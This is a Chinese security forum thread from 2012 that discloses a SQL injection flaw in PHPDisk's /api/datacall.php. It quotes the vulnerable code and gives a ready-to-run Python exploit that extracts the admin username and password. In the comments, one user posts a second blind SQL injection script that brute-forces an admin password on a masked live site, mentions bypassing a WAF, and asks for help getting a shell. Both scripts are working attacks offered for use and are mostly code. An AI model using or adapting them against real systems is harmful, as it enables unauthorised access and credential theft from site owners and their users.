phpdisk 注入

2012-06-18 18:48:46 14 5319


版本 不确定 反正我6.5 6.0都能射。。
/api/datacall.php
毫无技术含量 纯属为了引动大家的发帖热潮
神马土司被天朝接管都是浮云
$type = trim(gpc('type','G',''));

$order = trim(gpc('order','G','')); //获取参数

$by = trim(gpc('by','G',''));

$limit = (int)gpc('limit','G',0);



if(!$type || !$order || !$by || !$limit){

        echo 'PHPDisk Datacall Parameter is null or Error!';

        exit;

}

$filter_arr = array('select','delete','update','insert');

for($i=0;$i<count($filter_arr);$i++){

  if(strpos($order,strtolower($filter_arr[$i]))!==false){

    die('PHPDisk Datacall Parameter Error!');

  }

}



if($type=='user'){

        echo '<ul>'.LF;

        $q = $db->query("select username,userid from {$tpf}users order by $order $by limit $limit"); //你懂的,

        while ($rs = $db->fetch_array($q)) {

                echo '<li><a href="'.$settings['phpdisk_url'].urr("space","username=".rawurlencode($rs['username'])).'" target="_blank">'.$rs['username'].'</a></li>'.LF;

        }

        echo '</ul>'.LF;

        $db->free($q);
版本 不确定 反正我6.5 6.0都能射。。
/api/datacall.php

exp:
#!/usr/bin/python

#coding=utf-8

import urllib

import sys

def qz(url):

        fp=urllib.urlopen(url+"//api/datacall.php?type=user&order=12'&by=and 1=1&limit=1")

        data=fp.read()

        return data.split("select username,userid from ")[1].split("_users ")[0]



#print qz("http://127.0.0.1/www/disk/")



if len(sys.argv) !=1:

        host=sys.argv[1]

        qz=qz(host)

        fp=urllib.urlopen(host+"//api/datacall.php?type=user&order=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,"+qz+"_users.username,0x27,0x7e,"+qz+"_users.password,0x27,0x7e)%20from%20"+qz+"_users%20where%20userid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23"+"&by=and 1=1&limit=1")

        data=fp.read()

        #print data

        try:

                print "[*]Username: "+data.split("'~")[1]

                print "[*]Password: "+data.split("'~")[2]

        except:

                print "[#]Error!"

else:

                print "[#]Usage Exp.py [url]http://127.0.0.1[/url]"
类别 Web安全

关于作者

Cond0r136篇文章1277篇回复

Cond0r
14

评论14次

要评论?请先  登录  或  注册
  • 14楼
    a1258771
    Rank: 2
    2013-7-6 10:02

    有GPC啊。。。绕不过啊

  • 13楼
    Dd.
    Rank: 1
    2012-7-25 02:20

    挖洞子的牛伤不起啊,,膜拜~

  • 12楼
    M3loee
    Rank: 1
    2012-7-23 10:46

    小跃跃也开始挖洞子了...

  • 11楼
    bylucifer
    Rank: 1
    2012-7-19 00:52

    满地都是牛啊

  • 10楼
    dgrzh
    Rank: 1
    2012-7-13 10:38

    写的挺霸气的,xi望大家多多发贴

  • 9楼
    vivre 南京铱迅信息技术有限公司 测试工程师
    Rank: 1
    2012-7-12 12:52

    我也来爆一个吧,。 写的比较简陋,/account.php存在 盲注。慢慢跑出管理员的密码吧。 顺带绕了安全狗。 后台拿shell? 没成功,目标站点权限设置的比较死。没执行权限。 有能帮忙的可以PM我

    #!/usr/bin/env python # -*- coding: utf-8 -*- # #  untitled.py #   #  Copyright 2012 lee <lee@ubuntu> #   #  This program is free software; you can redistribute it and/or modify #  it under the terms of the GNU General Public License as published by #  the Free Software Foundation; either version 2 of the License, or #  (at your option) any later version. #   #  This program is distributed in the hope that it will be useful, #  but WITHOUT ANY WARRANTY; without even the implied warranty of #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the #  GNU General Public License for more details. #   #  You should have received a copy of the GNU General Public License #  along with this program; if not, write to the Free Software #  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #  MA 02110-1301, USA. #   #      import httplib2  import urllib import time  a=[] urlstr = 'http://www.*****.com/account.php?action=adminlogin&ref=/admincp.php' h = httplib2.Http('.cache') headers = {'Cookie': '123123' ,'Content-type': 'application/x-www-form-urlencoded'}  for l in range(1,33):         for ASCII in range(0,129):                 data="action=adminlogin&task=adminlogin&ref=%2Fadmincp.php&formhash=f0de1944&username=admin%27and/**/ascii(substring(password,"+str(l)+",1))="+str(ASCII)+"/**/and/**/'1'='1&password=666&loginsubmit=true"                 #print data                 response,content = h.request(urlstr, 'POST', data, headers=headers)                 if content.find("该用户名未注册")<0:                         if content.find("频繁")>0:                                 print '1'                                 l=l                                 time.sleep(65)                         print l,ASCII                         a.append(ASCII)                         print a

  • 8楼
    errorera
    Rank: 1
    2012-6-18 21:12

    这类话不适合放在exp失败啊 成功了还可以霸气下 所以先扣LZ一个金币

  • 7楼
    Cond0r
    Rank: 2
    2012-6-18 18:58

    改了 快给我加回来 JB不容易啊。。

  • 6楼
    Rices
    Rank: 2
    2012-6-18 18:56

    呵呵

  • 5楼
    xiehou
    Rank: 1
    2012-6-18 18:56

    还真霸气的,话说`说话得要有点礼貌好,不要出现fuck什么的`就好`

  • 4楼
    Cond0r
    Rank: 2
    2012-6-18 18:56

    fuck 我给你加了5JB 你竟然倒扣老夫 你给老夫等着。。

  • 3楼
    Rices
    Rank: 2
    2012-6-18 18:54

    加了

  • 2楼
    Cond0r
    Rank: 2
    2012-6-18 18:53

    fuckyou,这是上次叶子还是谁叫我这么写的 叫我写霸气点,,我直接用的那个 忘记改了。。快给老夫加分

  • 1楼
    Rices
    Rank: 2
    2012-6-18 18:50

    草泥马隔壁,失败了吧! 我觉得exp里面写这种低俗的话很不妥 xi望管理封了楼主帐号